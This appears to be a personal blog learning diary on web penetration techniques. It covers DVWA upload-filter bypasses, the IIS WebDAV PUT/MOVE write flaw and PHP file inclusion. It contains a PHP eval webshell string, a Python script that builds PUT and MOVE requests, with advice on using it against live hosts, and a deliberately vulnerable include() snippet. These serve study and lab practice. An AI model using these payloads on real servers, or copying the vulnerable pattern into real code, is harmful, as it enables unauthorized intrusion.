March 31, 2016 Infiltration learning summary


Today I studied three new vulnerabilities: truncation upload, the IIS write permission vulnerability, and PHP file inclusion.

Truncation upload: To learn truncation upload you need to set up the DVWA (Damn Vulnerable Web Application) test platform, which can be downloaded directly from the Internet. Open the DVWA site and go to its Upload module, which offers three difficulty levels. At the low level any file type can be uploaded and the server does not filter the file at all, so for such a site you can upload a PHP webshell directly and then connect to it with China Chopper. At the medium level the site checks the type of the uploaded file, but what it checks is the Content-Type sent in the multipart request, which the client controls; a file that does not match the allowed type is rejected, so intercept the request with Burp Suite, change the Content-Type to image/jpeg, and the upload succeeds. At the high level the site checks the extension at the end of the filename and refuses anything outside the allowed types, so 00 truncation (also called %00 truncation) is needed: intercept the request with Burp Suite, append a space and .jpg to the filename (shell.php becomes "shell.php .jpg"; jpg is a type the site allows), switch to the Hex view and change the space byte 20 to 00, then forward the request. The extension check now sees .jpg, but when the server builds the path to save the file the NUL byte terminates it, so the file is written as shell.php. This bypass depends on the PHP runtime truncating file paths at a NUL byte; PHP 5.3.4 and later reject paths that contain NUL, so it only works against older versions.
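The three DVWA levels and the 00 truncation, modelled in Python as an added example (this is not DVWA's code): each function emulates what one level inspects, stored_path shows where the file lands when the runtime cuts the path at a NUL byte (an assumption that holds for PHP before 5.3.4), and check_hardened shows what a check that survives all three tricks looks like. The allowed-type lists, upload directory and filenames are constructed for the example.

```python
"""Emulate the DVWA upload checks (low / medium / high) and the %00 bypass.

For a multipart upload the server sees three things: the filename and the
Content-Type from the multipart part (both attacker-controlled, since Burp
can rewrite them) and the file bytes themselves.
"""
from dataclasses import dataclass
from typing import Optional

ALLOWED_EXT = {"jpg", "jpeg", "png"}          # constructed allow-list
ALLOWED_MIME = {"image/jpeg", "image/png"}


@dataclass
class Upload:
    filename: str      # value of the Content-Disposition filename="..." field
    content_type: str  # value of the part's Content-Type header
    data: bytes


def check_low(u: Upload) -> bool:
    """Low: no filtering at all; a .php webshell goes straight through."""
    return True


def check_medium(u: Upload) -> bool:
    """Medium: only the client-supplied Content-Type is inspected, so editing
    it to image/jpeg in Burp is enough."""
    return u.content_type in ALLOWED_MIME


def check_high(u: Upload) -> bool:
    """High: the extension after the last dot of the filename is checked.
    'shell.php\\x00.jpg' ends in 'jpg' and passes."""
    ext = u.filename.rsplit(".", 1)[-1].lower()
    return ext in ALLOWED_EXT


def stored_path(upload_dir: str, filename: str, nul_truncating: bool) -> str:
    """Path the file is saved under. With nul_truncating=True the path is
    treated as a C string and cut at the first NUL (assumption modelling
    PHP < 5.3.4), so 'shell.php\\x00.jpg' is written as 'shell.php'."""
    if nul_truncating:
        filename = filename.split("\x00", 1)[0]
    return upload_dir.rstrip("/") + "/" + filename


def check_hardened(u: Upload) -> Optional[str]:
    """Return a rejection reason, or None if the upload is acceptable.
    Rejects control bytes in the name, allow-lists the extension and checks
    the bytes instead of trusting Content-Type. A real handler should also
    store the file under a server-chosen name in a directory where the web
    server does not execute scripts."""
    if any(ord(c) < 0x20 for c in u.filename):
        return "control byte in filename"
    if "." not in u.filename:
        return "no extension"
    if u.filename.rsplit(".", 1)[-1].lower() not in ALLOWED_EXT:
        return "extension not allowed"
    if not (u.data.startswith(b"\xff\xd8\xff") or u.data.startswith(b"\x89PNG\r\n\x1a\n")):
        return "content is not an image"
    return None


if __name__ == "__main__":
    shell = Upload("shell.php\x00.jpg", "image/jpeg", b"<?php @eval($_POST['pass']); ?>")
    print("high level accepts:", check_high(shell))
    print("saved as:", stored_path("/var/www/uploads", shell.filename, nul_truncating=True))
    print("hardened verdict:", check_hardened(shell))
```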


IIS write permission vulnerability: The vulnerability arises when WebDAV is enabled on the site and the web directory is writable. Guilin Veteran's (桂林老兵) two tools, IISPutScanner and the IIS write permission exploitation tool, can be used to upload files: the scanner checks whether the server accepts PUT, and the exploitation tool PUTs a file and then renames it with MOVE to an executable extension. In practice the vulnerability is only found on IIS 6.0 and earlier servers, and because it is old it is not described in detail here.
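What the two tools do, written out in Python as an added example (it is not Guilin Veteran's code): parse an OPTIONS response to see whether the site speaks WebDAV and allows PUT and MOVE, then build the PUT and MOVE requests. The sample response, host name and paths are constructed; the probe function is the only part that talks to a network.

```python
"""Detect the IIS WebDAV write-permission misconfiguration and build the
PUT + MOVE pair that exploits it."""
import http.client

# Constructed example of what a writable IIS 6.0 WebDAV site answers to
# "OPTIONS / HTTP/1.1" (not captured from a real server).
SAMPLE_OPTIONS_RESPONSE = (
    b"HTTP/1.1 200 OK\r\n"
    b"Server: Microsoft-IIS/6.0\r\n"
    b"MS-Author-Via: DAV\r\n"
    b"DAV: 1, 2\r\n"
    b"Allow: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, "
    b"MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH\r\n"
    b"Content-Length: 0\r\n"
    b"\r\n"
)


def parse_response_headers(raw: bytes) -> dict:
    """Lower-cased header name -> value for a raw HTTP response."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    headers = {}
    for line in head.split("\r\n")[1:]:   # skip the status line
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def allowed_methods(headers: dict) -> set:
    return {m.strip().upper() for m in headers.get("allow", "").split(",") if m.strip()}


def webdav_write_exposed(headers: dict) -> bool:
    """True when the server advertises WebDAV and accepts both PUT and MOVE.
    PUT alone is not enough: IIS normally refuses a direct PUT of .asp, so
    the tools PUT a .txt and MOVE it to .asp, which needs MOVE as well."""
    speaks_dav = "dav" in headers or "ms-author-via" in headers
    return speaks_dav and {"PUT", "MOVE"} <= allowed_methods(headers)


def build_put(host: str, path: str, data: bytes) -> bytes:
    """Step 1: write the file under a harmless extension."""
    return (
        f"PUT {path} HTTP/1.1\r\nHost: {host}\r\n"
        f"Content-Length: {len(data)}\r\nConnection: close\r\n\r\n"
    ).encode() + data


def build_move(host: str, src: str, dst: str) -> bytes:
    """Step 2: WebDAV MOVE; the new name goes in the Destination header."""
    return (
        f"MOVE {src} HTTP/1.1\r\nHost: {host}\r\n"
        f"Destination: http://{host}{dst}\r\nConnection: close\r\n\r\n"
    ).encode()


def probe(host: str, port: int = 80, path: str = "/") -> dict:
    """Live OPTIONS check with the standard library; returns parsed headers."""
    conn = http.client.HTTPConnection(host, port, timeout=5)
    conn.request("OPTIONS", path)
    resp = conn.getresponse()
    headers = {k.lower(): v for k, v in resp.getheaders()}
    conn.close()
    return headers


if __name__ == "__main__":
    hdrs = parse_response_headers(SAMPLE_OPTIONS_RESPONSE)
    print("WebDAV write exposed:", webdav_write_exposed(hdrs))
    # A real check would PUT a marker string first and only then the shell.
    print(build_put("target.example", "/test.txt", b"write-test").decode())
    print(build_move("target.example", "/test.txt", "/test.asp").decode())
```

On a live host replace the parsed sample with probe(host) and only proceed to PUT/MOVE when webdav_write_exposed returns True; a 201 Created on the PUT and a 201 or 204 on the MOVE confirm the misconfiguration.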


PHP file inclusion vulnerability: the principle is that a PHP site contains code such as this:

<?php
include('a.jpg');          // include() executes any PHP inside a.jpg, whatever its extension
$page = $_GET['include'];  // file name taken straight from the URL, attacker controlled
include($page);            // file inclusion: whatever path the attacker supplies is executed

The include parameter is taken from the URL, so the attacker chooses which file gets included. If that file is a PHP trojan the attacker has already placed on the server (for example PHP code hidden in an uploaded image like a.jpg, since include() executes PHP tags regardless of the extension), the effect is the same as having uploaded a PHP file directly: a one-line trojan can be connected with China Chopper, and a large webshell can be opened directly in the browser. That is how a file inclusion vulnerability is exploited.

I only learned the principle of this vulnerability today and have not yet learned how to exploit it concretely, so that is all I can say for now.

(The day after tomorrow is the Qingming Festival holiday and I am going home tomorrow, so I will not be writing over the holiday. I hope to see suggestions from many friends; please bear with me, and thank you!)


This article is from the "Xiao Yu" blog; please be sure to keep this source: http://791120766.blog.51cto.com/10836248/1759039
